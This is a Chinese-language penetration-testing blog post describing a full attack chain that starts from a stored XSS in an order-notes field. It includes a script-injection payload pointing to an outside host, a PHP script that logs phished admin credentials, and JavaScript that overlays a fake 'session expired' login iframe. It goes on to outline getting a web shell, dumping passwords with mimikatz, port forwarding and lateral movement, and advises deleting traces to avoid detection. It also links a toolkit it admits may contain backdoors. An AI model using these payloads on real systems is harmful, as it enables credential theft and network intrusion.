i春秋作家:jasonx
原文來自:一個xss漏洞到內網漫游【送多年心血打造的大禮包啦!】
前言
滲透過程中,有時候遇某些網站,明明檢測到有xss漏洞,但是盲打以后,收到的cookie還是不能登錄后台,大多數的原因都是因為對方的cookie關鍵參數開啟了httponly,導致你獲取到的cookie參數不全,所以沒法登錄。
今天和大家分享一次繞過httponly拿后台的思路。
0x01 遇到一個存在xss的站點
這個站點在提交訂單的時候,下面有個訂單備注輸入框存在存儲型xss。
我們直接插入插入xss代碼;
</textarea>'"><script src=https://xx.cc/x/7Zbi58></script>
過了沒多久拿到了cookie
但是我們嘗試用cookie登錄的時候失敗了。
那么問題來了,如何才能拿到后台呢?
0x02 xss釣魚拿下后台
因為xss平台已經收到后台的url地址了。
那么我們直接訪問這個后台地址,然后右鍵查看源代碼。
然后把所有代碼復制到我們新建的一個html文件里面。
修改里面的代碼,把所有相對路徑的地方,全部改成絕對路徑,(啥意思呢?請看下面分析。)
比如里面有的鏈接是這樣的 /index.php
我們要修改成被釣魚的域名加上/index.php
改完后應該是這樣的 http://被釣魚的域名.com/index.php
注意:所有相對路徑鏈接部分都要改。
然后我們把action=這里修改成我們的1.php文件地址(源碼在下面)<form action="http://www.我們的php域名.com/1.php" method="post" class="login-form">
1.php源碼如下
<?php $str=''; $str.='name:'.$_POST['name'].'|'; $str.='pwd:'.$_POST['pwd'].'|'; $str.='ip:'.$_SERVER["REMOTE_ADDR"].'|'; $str.='time:'.date("m-d-h:i"); file_put_contents('log.txt',$str.PHP_EOL, FILE_APPEND); #下面這行的意思是記錄完賬號密碼以后跳轉到他原來的后台地址。 header("location:https://www.baidu.com/admin.php"); ?> 注意:你的html文件里面的用戶名和密碼的參數名稱要對應1.php的修改。
name=的這里,要和1.php的對應,要不然接收不到賬號密碼。
1.php的后面添加上被釣魚方的后台首頁地址,成功拿到密碼以后會自動跳回他后台首頁。
接下來我們把這個html文件和1.php放到網站空間,直接phpstudy搭建一個也可以的。
現在去xss平台新建一個項目
名稱什么的隨便輸入,在自定義代碼處輸入以下代碼。
把其中的url地址修改成你的html地址。
setTimeout(function(){ alert("登陸過期,請重新登陸!"); parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src=\"https:\/\/我的釣魚域名.com/index.html\" frameBorder=0 scrolling=no></iframe>"); setTimeout(function(){ document.getElementsByTagName("body")[0].setAttribute("style","margin:2px;");},100); setTimeout(function(){ parent.document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");},100); },1500);我們把得到的xss地址復制下來,插入到訂單備注里面。
管理員看到我們的訂單以后,1.5秒后就會自動彈出“登錄過期,請重新登陸”的提示,並在url不改變的情況下,跳轉到我們偽造的登錄頁面上去了。
接下來只要管理員輸入了賬號密碼,並且提交,那么我們釣魚服務器就收到賬號密碼啦,管理員那邊也正常跳轉到他的后台。
注意:拿到賬號密碼以后請迅速刪掉你的xss項目,要不然管理員那邊每一次瀏覽你的訂單都會跳出這個登錄頁面,避免被發現。
另外實際操作的時候,你可以修改下代碼,比如判斷是否登錄成功,或者修改延時等等,我這只是提供一個思路,拋磚引玉吧。
然后我們用拿到的賬號密碼登錄后台,找上傳點getshell。
拿到shell以后我們用 mimikatz(咪咪卡住)獲取管理員密碼。
然后通過ipconfig看到對方服務器在內網,所以我們需要轉發端口出來,這里方法很多了,lcx轉發 ngrok等等都可以的。
轉發出來我們用獲取到的密碼直接登錄服務器。
先收集一波內網信息。
net view 列出工作組下的計算機名稱。 arp -a 查看arp緩存表。
然后就是橫向懟了。
附上釣魚的演示源碼
鏈接: https://pan.baidu.com/s/1VrvYXLy4ozXN-8iR7Uj7rA 提取碼: giu3
∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷ 華麗的分割線 ∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷
以上都不是重點,重點是我要放出自己用了多年的【滲透工具包】啦。
里面的很多工具都是一點點收集來的,因為都是來源於互聯網,部分工具可能存在后門,請大家下載以后自行查殺,部分批量的工具過於敏感就不放出來啦。
聲明:
工具是一把刀,既能切菜,也能傷人,我分享的初衷是便於大家做授權的滲透測試,所以請不要用於非法用途,否則一切后果自負。
閱讀原文即可下載滲透工具包